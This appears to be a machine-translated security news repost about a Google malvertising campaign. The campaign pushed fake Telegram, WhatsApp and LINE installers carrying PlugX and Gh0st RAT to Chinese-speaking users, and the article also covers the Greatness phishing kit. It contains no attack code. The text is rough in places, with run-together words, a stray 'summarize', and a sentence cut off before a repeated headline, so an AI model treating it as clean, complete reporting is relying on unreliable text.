summarize
Recently, the Chinese language user-targetedmalicious advertisementappeared on Google's platforms, where it induced users to download restrictive messaging apps such as Telegram as part of an ongoing malvertising campaign.
Malvertising campaign details
According to Jérôme Segura of Malwarebytes in a report on Thursday, the attackers abused Google advertiser accounts to create malicious advertisements and point them to pages that would undoubtedly download Remote Administration Trojans (RATs). Such programs allow attackers to take full control of a victim's computer and have the ability to drop moremalicious software.
Notably, the campaign, codenamed FakeAPP, follows a wave of attacks in late October 2023 targeting Hong Kong users looking for messaging apps like WhatsApp and Telegram on search engines.
The latest iteration of the campaign also adds messaging app LINE to the list, directing users to fake websites hosted on Google Docs or Google Sites.
cyber securityand fraudulent advertising
Google infrastructure is utilized to embed links to other websites under the attacker's control to distribute malicious installers that eventually deploy Trojans such as PlugX and Gh0st RAT.
Malwarebytes traced two fraudulent advertising accounts named Interactive Communication Team Limited and Ringier Media Nigeria Limited, both based in Nigeria.
Attackers seem to favor quantity over quality, Segura said, constantly rolling out new payloads and infrastructure as command and control.
Malvertising on Google
Additionally, Trustwave SpiderLabs uncovered a surge in the use of a phishing-as-a-service (PhaaS) platform called Greatness, which creates legitimate-looking credential-gathering pages targeting Microsoft 365 users.
The toolkit allows for personalization of sender names, email addresses, subjects, messages, attachments and QR codes to increase relevance and engagement, and comes with anti-detection measures such as randomized headers, coding and obfuscation designed to bypass spam filters and security systems.
Greatness is sold to other criminals for $120 per month, effectively lowering the barrier to entry and helping them scale their attacks.
The attack chain consisted of sending phishing emails with malicious HTML attachments that, when opened by the recipient, directed them to a fake login page that captured the login credentials entered and leaked the details to the attackers via Telegram.
Other infection sequences utilize attachments to drop malware on the victim's machine to facilitate information theft.
cyber securityand the modus operandi of the attack
To increase the likelihood of a successful attack, email messages masquerade as trusted sources, such as banks and employers, and use topics such as "Urgent Invoice Payment" or "Urgent Account Verification Request" to induce a false sense of urgency.
Trustwave notes that the number of victims cannot be determined at this time, but that Greatness is widely used and well-supported, and that its own Telegram community provides information on how to operate the toolkit, as well as other technical # Google ad malware targets Chinese-speaking users
Chinese-speaking users have recently been targeted by malicious adware that counterfeits ads from restricted messaging apps such as Telegram as part of an ongoing malvertising campaign.
Original article by Chief Security Officer, if reproduced, please credit https://www.cncso.com/en/malicious-ads-on-google-target-chinese-users-publishing.html
